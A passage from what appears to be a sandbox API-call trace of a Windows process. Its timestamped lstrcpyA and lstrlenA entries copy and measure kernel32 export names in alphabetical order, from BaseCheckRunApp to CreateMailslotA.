lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.496] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.496] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.496] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.496] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.496] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.496] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.496] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.496] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.496] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.496] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.496] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.496] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.496] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.496] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.496] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.496] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.497] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.497] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.497] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.497] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.508] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.508] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.508] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.508] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.508] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.508] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.508] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.508] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.508] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.508] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.508] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.508] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.508] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.508] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.508] lstrlenA (lpString="BEEP") returned 4 [0087.508] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.508] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.508] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.508] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.508] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.508] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.508] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.508] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.508] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.508] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.509] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.509] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.509] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.509] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.509] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.509] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.509] lstrlenA (lpString="CANCELIO") returned 8 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.509] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.509] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.509] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.509] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.509] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.509] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.509] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.509] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.509] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.509] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.509] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.509] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.510] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.510] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.510] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.510] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.510] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.510] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.510] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.510] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.510] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.510] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.510] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.510] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.510] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.510] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.510] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.510] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.510] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.510] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.510] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.511] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.511] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.511] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.511] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.511] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.511] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.511] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.511] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.511] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.511] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.511] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.511] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.511] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.511] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.511] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.511] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.511] lstrlenA (lpString="COPYFILEA") returned 9 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.511] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.511] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.511] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.512] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.512] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.512] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.512] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.512] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.512] lstrlenA (lpString="COPYFILEW") returned 9 [0087.512] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.512] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.512] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.512] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.512] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.512] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.512] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.512] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.512] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.512] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.512] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.512] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.512] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.512] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.512] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.512] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.512] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.512] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.514] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.514] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.514] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.514] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.514] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.515] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.515] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.515] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.515] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.515] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.515] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.515] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.515] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.515] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.515] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.515] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.515] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.515] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.515] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.515] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.515] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.515] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.515] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.516] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.516] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.516] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, 